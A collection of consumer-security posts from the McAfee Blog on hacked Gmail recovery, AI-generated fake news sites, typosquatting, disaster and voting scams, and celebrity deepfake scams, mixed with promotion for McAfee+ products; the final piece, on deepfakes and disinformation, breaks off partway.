You’ll find our AI-powered antivirus in all our McAfee+ plans. Better yet, our plans have dozens of protections that block the ways hackers distribute malware. To name just a few, our Text Scam Detector blocks links to suspicious sites that host malware and other attacks — and our Web Protection does the same for your browser. It also includes our industry-first online protection score that shows you just how safe you are, along with suggestions that can make you safer still. Together, our McAfee+ plans offer more than just antivirus. They protect your devices, your privacy, and your identity overall.

[i] https://www.historyofinformation.com/detail.php?entryid=2860

[ii] https://www.historyofinformation.com/detail.php?id=1676

[iii] https://www.theatlantic.com/technology/archive/2016/05/the-computer-virus-that-haunted-early-aids-researchers/481965/

[iv] https://www.forbes.com/sites/daveywinder/2020/05/04/this-20-year-old-virus-infected-50-million-windows-computers-in-10-days-why-the-iloveyou-pandemic-matters-in-2020

The post What is Malware? appeared first on McAfee Blog.

If you think your Gmail account’s been hacked, you’ll want to act. And act quickly.

The fact is that your email has all manner of personal info in there. Receipts, tax correspondence, medical info, and so on. With a hacked account, that info might get deleted, shared, or used against you for identity theft.

Luckily, Google has mechanisms in place to restore a hacked Gmail account. We’ll walk through the steps here — and a few others that can keep you secure in the long term after you have your account back.

What are signs that your Gmail account got hacked?

Several things can tip you off, including:

• Discovering sent messages that you didn’t send.
• Changes to the labels or filters that help organize your mail.
• Updates to your security settings.
• You can’t log into your account with your password.
• Your account has been deleted entirely.

With varying degrees of certainty, those are some signs that your account has been hacked.

Also, many people have a Google Account linked with their Gmail password and login. Beyond email, that might include files in Google Drive, photos, a YouTube account, and other features that contain personal info. In those cases, that only increases the potential harm of a hacked account.

Additionally, services like Google Pay and Google Play complicate matters more in the event of a hacked account because they contain financial info.

If you see any unusual changes in those apps or services, that might be a sign of a hacked account as well.

What to do if you can’t access your Gmail account

If you think someone else has changed your password or deleted your account, head to Google’s account recovery page. It’ll take you through a multi-step process to restore your account.

With that, you’ll want to do some quick prep. First, do your best to begin the recovery process with a device that you typically use to access your account. Also, if possible, do it in a location where you typically access your account. This provides Google with identifiers that you are who you say you are.

After that, gather up your Gmail account passwords, old and current. The recovery page will ask for them, along with other questions. Do your best to answer each question the very best you can. There’s no penalty for a wrong answer and the more info you can provide, the better.

If you can access your Gmail account, but you think someone else is using it

If you can log into your account, yet worry it’s been hacked, take these steps:

• Go to your Google Account login page at: https://myaccount.google.com/
• In the menu, select Security -> Recent security events.
• Look for any suspicious activity and mark the events “Yes” or “No” if you did or didn’t do them yourself.
• Next, select Security -> Manage devices.
• If you find a device that you don’t recognize: Select “Don’t recognize a device?” Then, follow the steps on the screen to help secure your account.
• Lastly, select Security -> Your devices -> Manage all devices.
• Select any unfamiliar device and then sign it out.

Next, run a virus scan on your device. Your password might have gotten compromised in one of several ways, including malware. This can remove any malware that might be spying on your device (and your passwords).

At this point, create a new password that’s strong and unique. Use at least 14 characters using a mix of upper- and lowercase letters, symbols, and numbers. Or have a password manager do that work for you.

And finally, set two-factor verification on your account if you aren’t already using it. This makes your account far tougher to hack, as two-factor verification requires a unique code to log in. One that only you receive. And just like with your password, never share your unique code. Anyone asking for it is a scammer.

Looking ahead: Ways you can prevent your Gmail account from getting hacked

By taking the steps we just covered, you’ve done two important things that can protect you moving forward. One is setting up a strong, unique password. The second is using two-factor verification.

The next thing is to get comprehensive online protection in place. Protection like you’ll find in our McAfee+ plans offers several features that can keep you and your accounts safe.

Once again, your password got compromised one way or another. It could have been spyware on your device. It could have been a phishing attack. It could have been a data breach. The list goes on. However, we refer to it as comprehensive online protection because it’s exactly that. In addition to antivirus, our McAfee+ plans have dozens of features that can protect your devices, identity, and privacy.

For example:

• It has the password manager we mentioned above, which can protect all your accounts online with strong, unique passwords.
• Our multi-award-winning antivirus detects and removes malware that tries to steal your personal info.
• It also has protections against phishing attacks and against websites that try to steal passwords and personal info — like our Text Scam Detector and Web Protection.
• Our McAfee+ plans also have identity monitoring, so if your accounts or personal info crop up on the dark web, you’ll get notified.
• And our plans also include Online Account Cleanup. It scans for accounts you no longer use and helps you delete them, along with your personal info, so you’re less exposed to data breaches.

Recovering from a hacked Gmail account

The important thing is this: if you think your Gmail account got hacked, act quickly. You might have much more than just your email linked to that account. Files, photos, and finances might be tied to it as well.

Even if something looks just slightly off, act as if your account got hacked. Log in, change your password, establish two-step verification if you haven’t, and take the other steps mentioned above. Above and beyond your email and all the personal info packed in there, your account can give a hacker access to plenty more.

The post How to Reset Your Gmail Password After Being Hacked appeared first on McAfee Blog.

The number of AI-powered fake news sites has now surpassed the number of real local newspaper sites in the U.S.

How? AI tools have made creating entire fake news sites quicker and easier than before — taking one person minutes to create what once took days for dozens and dozens of people.

Researchers say we crossed this threshold in June 2024, a “sad milestone” by their reckoning.[i] As traditional, trusted sources of local news shut down, they’re getting replaced with sensationalistic and often divisive fake news sites. What’s more, many of these fake news sites pose as hometown newspapers.

They’re anything but.

These sites produce disinformation in bulk and give it a home. In turn, the articles on these fake news sites fuel social media posts by the thousands and thousands. Unsuspecting social media users fall for the clickbait-y headlines, click the links, read the articles, and get exposed to yet more “news” on those sites – which they then share on their social feeds thinking the stories are legit. And the cycle continues.

As a result, social media feeds find themselves flooded with falsehoods, misrepresentations, and flat-out lies. Researchers spotted the first of them in mid-2023, and they number of them are growing rapidly today.

In all, the rise of AI-powered fake news sites now plays a major role in the spread of disinformation.

What is disinformation — and misinformation?

When we talk about so-called “fake news,” we’re really talking about disinformation and misinformation. You might see and hear those two terms used interchangeably. They’re different, yet they’re closely related.

Disinformation is intentionally spreading misleading info.

Misinformation is unintentionally spreading misleading info (the person sharing the info thinks it’s true).

This way, you can see how disinformation spreads. A bad actor posts a deepfake with deliberately misleading info — a form of disinformation. From there, others take the misleading info at face value and pass it along as truth via social media — a form of misinformation.

The bad actors behind disinformation campaigns know this relationship well. Indeed, they feed it. In many ways, they rely on others to amplify their message for them.

The explosion of fake news sites

With that, we’re seeing an explosion of fake news sites with content nearly, if not entirely, created by AI — with bad actors pushing the buttons.

Funded by partisan operations in the U.S. and by disinformation operations abroad, these sites pose as legitimate news sources yet push fake news that suits their agenda — whether to undermine elections, tarnish the reputation of candidates, create rifts in public opinion, or simply foster a sense of unease.

One media watchdog organization put some striking figures to the recent onrush of fake news sites. In May 2023, the organization found 49 sites that it defined as “Unreliable AI-Generated News Websites,” or UAINS. In February 2024, that number grew to more than 700 UAINS.[ii]

Per the watchdog group, these sites run with little to no human oversight. Additionally, they try to pass themselves off as legitimate by presenting their AI “authors” as people.[iii] Brazenly, at least one publisher had to say this when confronted with the fact that his “reporter” bylines were really AI bots:

The goal was to create “AI personas” that can eventually “grow into having their own following,” maybe even one day becoming a TV anchor. “Each AI persona has a unique style … Some sort of — this is probably not the right word — personality style to it.” [iv]

Beyond spreading disinformation, these sites are profitable. Recent research found that among the top 100 digital advertisers, 55% of them had their ads placed on disinformation sites. Across all industries and brands, 67% of those with digital ads wound up on disinformation sites.[v]

To clarify, these advertisers support these disinformation sites unwittingly. The researchers cite the way that online advertising platforms algorithmically place ads on various sites as the culprit. Not the advertisers themselves.

So as we talk about disinformation sites cropping up at alarming rates, we also see bad actors profiting as they prop them up.

Many AI-powered fake news sites try to pass themselves off as “hometown” papers

Follow-up research pushes the estimated number of AI-powered fake news sites yet higher. In June, analysts discovered 1,265 sites targeting U.S. internet users with fake news – many posing as “local” news outlets. Shockingly, that figure surpasses the number of local newspapers still running in the U.S., at 1,213 outlets.[vi] (Side note: between 2005 and 2022, some 2,500 local newspapers shuttered in the U.S.[vii])

The actors and interests behind these sites follow a straightforward formula. In word salad fashion, they’ll mix the name of a town with classic publication names like Times, Post, or Chronicle to try to give themselves an air of credibility. Yet the content they post is anything but credible. AI generates the content from tip-to-tail, all to suit the disinformation the site wants to pump out.

The U.S. isn’t alone here. Similar sites have cropped up in the European Union as well. The European Union’s Disinformation Lab (EU DisinfoLab) found that outside actors mimicked several legitimate European sites and used them to spread disinformation.[viii] Legitimate sites that outside actors mimicked included Bild, The Guardian, and the NATO website.

How can you spot an AI-generated fake news website?

The answer is that it’s getting tougher and tougher.

Fake news sites once gave off several cues that they were indeed fake, whether because they were created by earlier, cruder versions of AI tools or by human content creators. They simply didn’t look, feel, or read right. That’s because it took a lot of manual work to create a fake news site and make it look legitimate.

For starters, the site needed a sharp visual design and an easy way of surfacing articles to readers. It also meant cooking up a virtual staff, including bios of owners, publishers, editors, and bylines for the writers on the site. It also called for creating credible “About” pages and other deeper site content that legitimate news sites feature. Oh, and it needed a nice logo too. Then, and only then, could the actors behind these sites start writing fake news articles.

Now, AI does all this in minutes.

The Poynter Institute for Media Studies, a non-profit journalism school and research organization, showed how it indeed took minutes using several different AI tools.[ix] One tool created fake journalists, along with backgrounds, bylines, and photos. Another tool provided the framework of web code to design and build the site. As for the articles themselves, a few prompts into ChatGPT wrote serviceable, if not bland, articles in minutes as well.

As a result, these sites can look “real enough” to casual viewers. Taken at face value, all the trappings of a legitimate news site are there, with one exception — the articles. They’re fake. And they go on to do the damage that the bad actors behind them want them to do.

So, what news can you trust online?

The people who create these fake news sites rely on others to take the lies they push at face value — and then immediately react to the feelings they stir up. Outrage. Anger. Dark joy. Without pause. Without consideration. If an article or post you come across online acts taps into those emotions, it’s a sure-fire sign you should follow up and see if what you’ve stumbled across is really real.

Here are a few things you can do:

Seek out objective reporting.

Outside of a newspaper’s Op-Ed pages where editorial opinions get aired, legitimate editorial staff strive for objectivity—reporting multiple dimensions of a story and letting the facts speak for themselves. If you find articles that are blatantly one-sided or articles that blast one party while going excessively easy on another, consider that type of reporting a red flag.

Watch out for clickbait.

Sensationalism, raw plays to emotion, headlines that conjure outrage — they’re all profitable because they stir people up and get them to click. Content like this is the hallmark of fake news, and it’s certainly the hallmark of AI-powered fake news as well. Consider stories like these as red flags as well.

Use fact-checking resources.

Come across something questionable? Still uncertain of what you’re seeing? You can turn to one of the several fact-checking organizations and media outlets that make it their business to separate fact from fiction. Each day, they assess the latest claims making their way across the internet — and then figure out if they’re true, false, or somewhere in between.

• Politifact.com
• Snopes.com
• FactCheck.org
• Reuters Fact Check
• AP Fact Check

Check other known and long-standing news sources.

Search for other reputable sources and see what they’re saying on the topic. If anything at all. If the accounts differ, or you can’t find other accounts at all, that might be a sign you’re looking at fake news.

Additionally, for a list of reputable information sources, along with the reasons they’re reputable, check out “10 Journalism Brands Where You Find Real Facts Rather Than Alternative Facts.” It’s published by Forbes and authored by an associate professor at The King’s College in New York City.[x] It certainly isn’t the end-all, be-all of lists, yet it provides you with a good starting point. Both left-leaning and right-leaning editorial boards are included in the list for balance.

Stick with trusted voter resources.

With Election Day coming around here in the U.S., expect many bad actors to push false voting info, polling results, and other fake news that tries to undermine your vote. Go straight to the source for voting info, like how to register, when, where, and how to vote — along with how to confirm your voting registration status. You can find all this info and far more with a visit to https://www.usa.gov/voting-and-elections.

You can find another excellent resource for voters at https://www.vote411.org, which is made possible by the League of Women Voters. Particularly helpful is the personalized voting info it offers. By entering your address, you can:

• See what’s on your ballot.
• Check your voter registration.
• Find your polling place.
• Discover upcoming debates in your area.

If you have further questions, contact your state, territory, or local election office. Once again, usa.gov offers a quick way to get that info at https://www.usa.gov/state-election-office.

[i] https://www.newsguardtech.com/press/sad-milestone-fake-local-news-sites-now-outnumber-real-local-newspaper-sites-in-u-s/

[ii] https://www.newsguardtech.com/press/newsguard-launches-2024-election-misinformation-tracking-center-rolls-out-new-election-safety-assurance-package-for-brand-advertising/

[iii] https://www.bloomberg.com/news/newsletters/2024-05-17/ai-fake-bylines-on-news-site-raise-questions-of-credibility-for-journalists

[iv] Ibid.

[v] https://www.nature.com/articles/s41586-024-07404-1

[vi] https://www.newsguardtech.com/press/sad-milestone-fake-local-news-sites-now-outnumber-real-local-newspaper-sites-in-u-s/

[vii] https://localnewsinitiative.northwestern.edu/research/state-of-local-news/2022/report/

[viii] https://www.cybercom.mil/Media/News/Article/3895345/russian-disinformation-campaign-doppelgnger-unmasked-a-web-of-deception/

[ix] https://www.poynter.org/fact-checking/2023/chatgpt-build-fake-news-organization-website/

[x] https://www.forbes.com/sites/berlinschoolofcreativeleadership/2017/02/01/10-journalism-brands-where-you-will-find-real-facts-rather-than-alternative-facts

The post Hallucinating Headlines: The AI-Powered Rise of Fake News appeared first on McAfee Blog.

Typosquatting is when someone registers a web address that’s a misspelling of a known website — usually a popular one. Typically, it’s done with cybercrime in mind.

Take the example of “Aamazon.com” over “Amazon.com.” A few things could happen:

• A person could mistakenly tap in a typo of “Aamazon” and wind up on a counterfeit “Aamazon.com” site.
• A scammer could use the “Aamazon” address in a phishing link sent by email, text, or social media — trying to trick victims into thinking it’s a legitimate link.
• The phony “Aamazon” address could show up in search, leading people to think it’ll take them to the legitimate Amazon site.

As you can imagine, all of this can lead to no good. Often, scammers set up typosquatting sites to steal personal and financial info. Victims think they’re on a legitimate site, shop, or conduct their business as usual, only to later find that they’ve had their info stolen, got ripped off, or some combination of the two.

Several real-life examples of typosquatting cropped up with the launch of AnnualCreditReport.com a few years back. Run by Central Source, LLC, the site is a joint venture of three major U.S. credit bureaus — Equifax, Experian, and TransUnion.

With the launch, scammers set up hundreds of copycat sites with typosquatted addresses.[i] Victims clicked on links thinking they took them to the real free credit reporting site. Instead, they fed their personal info into bogus sites. To this day, AnnualCreditReport.com recommends visiting the site by carefully typing the address into your browser and then creating a bookmark for it.[ii]

Aside from phishing attacks, typosquatters also use their bogus sites to spread malware. In some cases, they spread it by tricking victims into downloading a malware file disguised as, say, a coupon or offer. Other cases get a little more complicated in what are called “drive-by attacks.” With a drive-by, a victim doesn’t need to download anything to get malware on their device. Here, hackers plant code into their bogus sites that take advantage of known vulnerabilities.

To counter this, many businesses, brands, and organizations register typo-riddled addresses on their own. This prevents hackers and scammers from doing the same. Additionally, legitimate owners can have the typo’ed address redirect people to the proper address.

You can do a few things to protect yourself as well:

Be careful when clicking links in messages, emails, and texts.

Typosquatting addresses can look “close enough” to a legitimate address at first glance. Preferably, type in the address in your browser and access the site that way. (For example, when following up on an email notice from your credit card company.)

Also, you can use the combo of our Text Scam Detector and Web Protection. You’ll find them in our McAfee+ Plans. Together, they alert you of sketchy links and prevent you from visiting a malicious website if you tap or click a bad link by mistake.

Keep your operating system and apps up to date

Hackers try to exploit vulnerabilities in your devices and the apps you have installed on them. Regular updates fix these vulnerabilities and sometimes introduce new features and other improvements.

Also, be on the lookout when you search

Typosquatted sites and counterfeit sites in general appear in search results. Sometimes they appear on their own. Other times, scammers abuse ad platforms to push their bogus sites close to the top of the search results. We’ve also seen the newly released “AI overviews” in search include bad info in their summaries, including links. AI tools are only as good as the info they get fed, and sometimes they get fed junk.

[i] https://domainnamewire.com/2014/10/21/annualcreditreport-com-goes-after-a-big-typosquatter/

[ii] https://www.annualcreditreport.com/suspectPhishing.action

The post How Typosquatting Scams Work appeared first on McAfee Blog.

In the aftermath of a major disaster like Hurricane Helene and Milton, people come together to rebuild and recover. Unfortunately, alongside the genuine help, there are always opportunistic scammers ready to exploit the chaos for personal gain. Knowing what to look out for can help protect you and your community from falling victim to these fraudulent schemes.  

The National Center for Disaster Fraud (NCDF), established by the Justice Department after Hurricane Katrina in 2005, reminds the public to be cautious of hurricane-related solicitations. As natural disasters, like Hurricane Helene, often bring out the best in people eager to help, they also provide an opportunity for criminals to exploit the situation by stealing money or personal information. Here are some of common scams and fraud to watch out for, and how you can safeguard yourself. 

1. Unlicensed Contractors and Repair Fraud

As residents begin to rebuild, many turn to contractors for help with repairs. Scammers often pose as legitimate contractors but lack proper licensing or qualifications. They may demand upfront payment and then disappear without completing the work or do subpar repairs.  

How to Protect Yourself: 

• Verify that the contractor is licensed and insured by checking local or state licensing boards. 

• Ask for references and check reviews from previous customers. 

• Never pay the full amount upfront. A reasonable down payment is typical, but reputable contractors will bill after work has been completed to your satisfaction. 

• Always research contractors through your local Better Business Bureau or trusted referrals. 

2. Fake Charity Solicitations

Disasters often inspire a wave of generosity, but they also give rise to fake charities. Scammers may set up fraudulent organizations that claim to be helping victims of Hurricane Helene and Milton, only to pocket the money for themselves. 

How to Protect Yourself: 

• Always research a charity before donating. Use resources like the Better Business Bureau (BBB), Charity Navigator, or GuideStar to verify that the charity is legitimate. 

• Avoid giving donations in cash, gift cards, or through wire transfers, as these methods are harder to trace. 

• Be wary of unsolicited emails, social media posts, or phone calls asking for donations. Always donate directly through the charity’s official website.

3. Price Gouging

After a major disaster, there is often a sharp increase in demand for essential goods like water, fuel, and building supplies. Unscrupulous businesses or individuals may take advantage by charging exorbitant prices. 

How to Protect Yourself: 

• Report any suspiciously high prices to your state’s Attorney General or consumer protection agency. 

• Keep receipts and note down prices before and after the disaster to provide evidence of price gouging.

4. Impersonation of Government Officials

Scammers may pose as FEMA representatives, insurance adjusters, or other government officials. They’ll claim to help expedite your relief or insurance claim in exchange for personal information or payment. 

How to Protect Yourself: 

• FEMA and other government officials will never ask for money to process claims or offer help. 

• Always verify the identity of anyone claiming to represent a government agency by asking for official identification and cross-referencing their contact information with official websites. 

• Never share sensitive personal information, such as your Social Security number, over the phone or via email.

5. Phishing Scams

Cybercriminals often send out emails or texts that look like they’re from legitimate organizations, trying to trick people into clicking on malicious links. These phishing scams can lead to identity theft or financial loss. 

How to Protect Yourself: 

• Do not click on links or download attachments from unsolicited emails, especially those that seem urgent or request personal information. 

• Check the sender’s email address carefully for slight misspellings or odd characters. 

• When in doubt, contact the organization directly using verified contact information from their official website. 

• Use a robust and trustworthy scam detection tool. McAfee can block risky sites even if you accidentally click a link in a scam text. When it comes to text messages, our smart AI puts a stop to scams before you click—detecting any suspicious links and sending you an alert.

In the wake of Hurricane Helene and Milton, the most important thing you can do is stay vigilant. While the majority of people are focused on helping and healing, there will always be a small number looking to take advantage. By recognizing the signs of common scams and taking precautionary measures, you can protect yourself and your community from further harm. If you suspect you’ve been targeted by a scam, report it to local law enforcement or the Federal Trade Commission (FTC) immediately. 

The post How to Avoid Scams in the Wake of Hurricane Helene and Milton appeared first on McAfee Blog.

With the election quickly approaching, it’s essential to be informed and cautious about the growing number of voting scams. Scammers are becoming more sophisticated, using everything from artificial intelligence to fake text messages to trick people into sharing sensitive information. Here’s a breakdown of the types of voting scams that have already been seen this year and the specific steps you can take to protect yourself.

Text scams

Scammers pretending to be election workers are sending fraudulent text messages to Maryland voters, falsely claiming they are not registered to vote in November. The texts urge recipients to click a fake link to “resolve” their registration status. Similar scams have been reported across the country from Sacramento, California to Marietta, Georgia.

How to protect yourself:

• Use official websites: Always use your state’s official election website to register to vote, check your registration status, or find polling locations. Nonpartisan website Vote.org lets voters anywhere in the country check their registration status.
• Avoid clicking on links in unsolicited texts: Never trust third-party websites linked through unsolicited messages. Legitimate voter registration information is not sent through random text messages. If you receive one, delete it immediately.
• Use threat detector technology: McAfee’s Text Scam Detector uses AI to spot and block scam texts before they can do you harm by automatically identifying and alerting you if it detects a dangerous URL in your texts.
• Report suspicious messages: If you receive a suspicious text, notify your state election board or a trusted election protection hotline to ensure authorities are aware of the scam.

Early voting scams

A new voting scam is targeting seniors in Michigan, where scammers are asking for Social Security and credit card information under the pretense of early voting opportunities. Michigan’s Secretary of State office has received numerous complaints about seniors being approached in person by imposters posing as election workers while trying to steal individuals’ identities.

How to protect yourself:

• Know what’s required for voter registration: Voter registration never requires full Social Security numbers or financial information. Anyone asking for these details is likely a scammer.
• Help vulnerable individuals stay informed: Seniors are often targeted by these scams. Make sure your family members or community members know to avoid giving out personal information to unsolicited callers or visitors. Follow your state’s election office on social media for real-time updates so that you can know of any active scam threats in your community.
• Use identity theft protection software: Installing reputable identity theft protection software can set up 24/7 identity monitoring and alerts, plus up to $2 million in identity theft coverage, for greater peace of mind.

AI Robo Calls

A bipartisan group of 51 attorneys general issued a warning to Life Corporation, a company accused of sending scam robocalls during the New Hampshire primary. These calls used AI to impersonate President Biden and spread false information to discourage voter participation. While this bipartisan task force is committed to tackling illegal robocalls nationwide, citizens should still be aware of the risk of deepfake audio.

How to protect yourself:

• Don’t trust caller ID: Spoofing technology can make robocalls appear as if they’re coming from legitimate sources. If you receive a suspicious call, hang up immediately.
• Never give personal information over the phone: Legitimate election officials will not ask for Social Security numbers, financial information, or other sensitive data over the phone.
• Verify through official channels: Always check information by visiting your local election office’s website or calling their publicly listed phone number. Do not rely on information provided in unsolicited calls.
• Block and report robocalls: Use call-blocking apps or features on your phone to prevent further calls and report suspicious robocalls to your state’s election office or the Federal Communications Commission (FCC).

Scams tend to increase during election years, so be proactive in safeguarding against these latest fraud tactics. By following these steps, you can help protect yourself from falling victim to election-related scams. Voting is a critical part of democracy, and staying vigilant is key to both safeguarding your personal information and your right to participate.

The post Beware of These Voting Scams Happening Now appeared first on McAfee Blog.

In today’s digital world, the line between reality and deception has become increasingly blurred, with cybercriminals leveraging cutting-edge AI technologies to exploit our trust and interest in celebrities. As we continue to engage with the internet in unprecedented ways, McAfee’s 2024 Celebrity Hacker Hotlist sheds light on a growing threat—online scams using the identities of our favorite stars. 

Scarlett Johansson Leads the List of Most Exploited Celebrity Names 

At the forefront of McAfee’s latest list is Scarlett Johansson, a renowned actress, recognized for her roles in Marvel’s Black Widow and Lost in Translation. However, this time, Johansson isn’t making headlines for a movie—she’s ranked as the U.S. celebrity whose name is most frequently used in online scams. Her likeness has been used in AI-generated deepfakes, from unauthorized ads to fake endorsements, creating a major risk for unsuspecting fans. The list doesn’t stop with Johansson. Celebrities like Kylie Jenner, Taylor Swift, and Tom Hanks also find themselves in the top 10, with hackers exploiting their images, voices, and reputations to deceive internet users. Whether it’s for fake giveaways, cryptocurrency scams, tickets to high-demand concerts, free downloads, or disinformation campaigns, these stars are unwilling participants in the cybercrime ecosystem. 

McAfee’s 2024 Hacker Celebrity Hot List: Top Ten  

McAfee’s Threat Research Labs Team compiled the Celebrity Hacker Hotlist by identifying the celebrities – including social media influencers – whose names and likenesses are most often exploited to lead consumers to online scams. This ranges from the purchase of fake goods or services that then steal your money or bank details to social media or email scams that convince consumers to click a risky link that unknowingly installs malware. All of these scams jeopardize consumers’ data, privacy, and identity.  

The top ten list includes a combination of longtime talent and more recently well-known names from various fields, showcasing their potential influence on consumers of all generations:  

1. Scarlett Johansson: Actress and Singer whose name and likeness has been used without permission for advertisements and endorsements, outspoken advocate against non-consensual AI-generated content
2. Kylie Jenner: Reality star and influencer whose name and likeness has been used without permission for social media giveaway scams and fake Kylie Cosmetics products and websites
3. Taylor Swift: Singer whose name and likeness has been used without permission for celebrity endorsement, ticket scams, and product giveaway scams, as well as for disinformation (political endorsement)
4. Anya Taylor-Joy: Actress whose name, and social account/likeness has been used without permission for a giveaway scam, and to spread misinformation about her streaming series
5. Tom Hanks: Actor whose name and likeness has been used without permission to promote “miracle cures and wonder drugs”
6. Sabrina Carpenter: Singer whose name and likeness has been used without permission for fake ticketing scams and to advertise an app for creating sexually explicit images
7. Sydney Sweeney: Actress whose name and likeness has been used without permission for crypto scams
8. Blake Lively: Actress whose likeness was used without permission in a weight loss gummy scam
9. Johnny Depp: Actor whose likeness has been used without permission in giveaway, crypto, and fundraising scams
10. Addison Rae: Singer and actress whose likeness has been used without permission for fake endorsements, giveaways, and crypto scams

The Rise of AI Deepfakes in Cybercrime 

 The advent of AI has revolutionized many industries, but it’s also given cybercriminals a powerful new tool: the deepfake. In addition to phishing scams and links containing malware that exploit the popularity and reputation of celebrities and deceive their fans, these highly realistic video or audio clips can mimic the likeness of a person, making it nearly impossible to tell whether the content is real or fake. Deepfakes of celebrities are now being used to promote fraudulent products, steal personal information, and trick people into downloading malware. Imagine watching a video of your favorite star endorsing a new product, only to find out later it wasn’t them at all. This is no longer a distant possibility but a reality many fans face as scammers get better at crafting fake content. In fact, some of these AI-generated videos are so convincing that even the savviest of internet users can fall for them. 

For instance, Tom Hanks’ image was manipulated to promote dubious “miracle cures,” while Taylor Swift’s likeness has been used in fake political endorsements. Johnny Depp and Kylie Jenner’s names have been used by scammers in fake cryptocurrency giveaways, luring fans to engage with risky websites or phishing scams. 

The Impact on Fans and Celebrities 

While these scams primarily aim to steal money or personal data from consumers, the effects are far-reaching. For fans, the consequences can be devastating, with financial losses ranging from a few hundred dollars to over half a million. In addition to the financial risks, victims often feel violated after engaging with fraudulent content. For celebrities, these scams can have a serious impact on their public image and brand. Many stars, including Johansson, have taken a firm stand against the unauthorized use of their images in AI-generated content. As Johansson has publicly expressed, it’s not just about personal privacy but about the broader implications of AI and the need for accountability in the tech world. 

Staying Safe in the Age of AI Scams  

As AI becomes more accessible, these scams are only expected to rise. To combat this growing issue, McAfee recently introduced a powerful combination of educational resources and advanced, AI-powered technology:  McAfee Deepfake Detector, the world’s first automatic and AI-powered deepfake detector, and the McAfee Smart AI Hub, a go-to online space for the latest in AI security knowledge and news. Here are some practical tips to protect yourself from AI-generated scams: 

1. Scrutinize Social Media: Social media platforms are hotbeds for disinformation and scams. Be skeptical of shocking or too-good-to-be-true claims, especially if they involve celebrities.
2. Validate Sources: Always verify claims by cross-checking with reliable news outlets and websites. Don’t trust content without fact-checking it first.
3. Detect Deepfakes: Look closely at the content for unnatural features—odd blinking patterns, mismatched audio, or distorted body parts can be signs of a deepfake.
4. Engage with Caution: Avoid commenting on, sharing, or even clicking on unverified social media posts. Engaging with them can increase your exposure to scams.
5. Be Mindful of Your Information: Never give out your personal details to unverified sources or websites. Phishing scams often request sensitive information under the guise of a celebrity endorsement or giveaway.

In 2024, staying safe online means being aware of the rapidly evolving landscape of AI and cybercrime. Scammers are getting better at mimicking trusted names like Scarlett Johansson, Kylie Jenner, and Johnny Depp to deceive fans. With AI-powered tools like deepfake detectors and informed vigilance, we can reduce the risk of falling victim to these digital traps. Stay informed, stay cautious, and always think twice before clicking on a too-good-to-be-true celebrity endorsement. For more information about McAfee’s 2024 Celebrity Hacker Hotlist and ways to protect yourself, visit https://www.mcafee.ai 

Methodology  

The study was conducted by McAfee® threat intelligence researchers to determine the number of risky sites and amount of misleading content generated by searching a celebrity name with commonly used terms. A risk score was calculated for each celebrity using a combination of McAfee WebAdvisor results and an analysis of known deepfakes recorded between January 1 to September 15, 2024. McAfee’s WebAdvisor browser extension leverages McAfee’s technology to protect users from malicious websites and, when turned on, rates nearly every internet website it finds, using red, yellow and green icons to indicate the website’s risk level and blocking access to or warning a user if they click on a malicious or risky URL link. Ratings are created by using patented advanced technology to conduct automated website tests and works with Chrome, Edge, Safari, and Firefox. 

The post Scarlett Johansson Tops McAfee’s 2024 Celebrity Hacker Hotlist for AI Online Scams appeared first on McAfee Blog.

Bad news travels quickly. Or so goes the old saying. Yet we do know this: disinformation and fake news spread faster than the truth. And what makes it spread even faster is AI.

A recent study on the subject shows that fake news travels across the internet than stories that are true. Complicating matters is just how quickly and easily people can create fake news stories with AI tools.

Broadly speaking, AI-generated content has flooded the internet in the past year — an onrush of AI voice clones, AI-altered images, video AI deepfakes, and all manner of text in posts. Not to mention, entire websites are populated with AI-created content.

One set of published research shows how this glut of AI-created content has grown since AI tools started becoming publicly available in 2023. In just the first three months of 2024, one set of research suggests that the volume of deepfakes worldwide surged by 245% compared to the start of 2023. In the U.S., that figure jumped to 303%.[i]

But before we dive into the topic, we need to make an important point — not all AI-generated content is bad. Companies use AI deepfake technologies to create training videos. Studios use AI tools to dub movies into other languages and create captions. And some content creators just want to get a laugh out of Arnold Schwarzenegger singing show tunes. So, while deepfakes are on the rise, not all of them are malicious.

The problem arises when people use deepfakes and other AI tools to spread disinformation. That’s what we’ll focus on here.

First, let’s look at what deepfakes are and what disinformation really is.

What is a deepfake?

First, what is a deepfake? One dictionary definition of a deepfake reads like this:

An image or recording that has been convincingly altered and manipulated to misrepresent someone as doing or saying something that was not actually done or said.[ii]

Looking closely at that definition, three key terms stand out: “altered,” “manipulated,” and “misrepresent.”

Altered

This term relates to how AI tools work. People with little to no technical expertise can tamper with existing source materials (images, voices, video) and create clones of them.

Manipulated

This speaks to what can be done with these copies and clones. With them, people can create entirely new images, tracts of speech, and videos.

Misrepresent

Lastly, this gets to the motives of the creators. They might create a deepfake as an obvious spoof like many of the parody deepfakes that go viral. Or maliciously, they might create a deepfake of a public official spewing hate speech and try to pass it off as real.

Again, not all deepfakes are malicious. It indeed comes down to what drives the creator. Does the creator want to entertain with a gag reel or inform with a how-to video narrated by AI? That’s fine. Yet if the creator wants to besmirch a political candidate, make a person look like they’ve said or done something they haven’t, or to pump out false polling location info to skew an election, that’s malicious. They clearly want to spread disinformation.

What is disinformation — and misinformation?

You might see and hear these terms used interchangeably. They’re different, yet they’re closely related. And both will play a role in this election.

Disinformation is intentionally spreading misleading info.

Misinformation is unintentionally spreading misleading info (the person sharing the info thinks it’s true).

This way, you can see how disinformation spreads. A bad actor posts a deepfake with misleading info — a form of disinformation. From there, others take the misleading info at face value, and pass it along as truth — a form of misinformation.

The two work hand-in-hand by design, because bad actors have a solid grasp on how lies spread online.

How do deepfakes spread?

Deepfakes primarily spread on social media. And disinformation there has a way of spreading quickly.

Researchers found that disinformation travels deeper and more broadly, reaches more people, and goes more viral than any other category of false info.[iii]

According to the research findings published in Science,

“We found that false news was more novel than true news, which suggests that people were more likely to share novel information … Contrary to conventional wisdom, robots accelerated the spread of true and false news at the same rate, implying that false news spreads more than the truth because humans, not robots, are more likely to spread it.”

Thus, bad actors pump false info about them into social media channels and let people spread it by way of shares, retweets, and the like.

And convincing deepfakes have only made it easier for bad actors to spread disinformation.

How AI tools supercharge the spread of disinformation and “fake news.”

The advent of AI tools has spawned a glut of disinformation unseen before, and for two primary reasons:

1. Bogus articles, doctored photos, and fake news sites once took time and effort to cook up. Now, they take seconds.
2. AI tools can effectively clone voices and people to create convincing-looking deepfakes in digital form.

In effect, the malicious use of AI makes it easier for fakery to masquerade as reality, with chilling authenticity that’s only increasing. Moreover, it churns out fake news on a massive scope and scale that’s increasing rapidly, as we cited above.

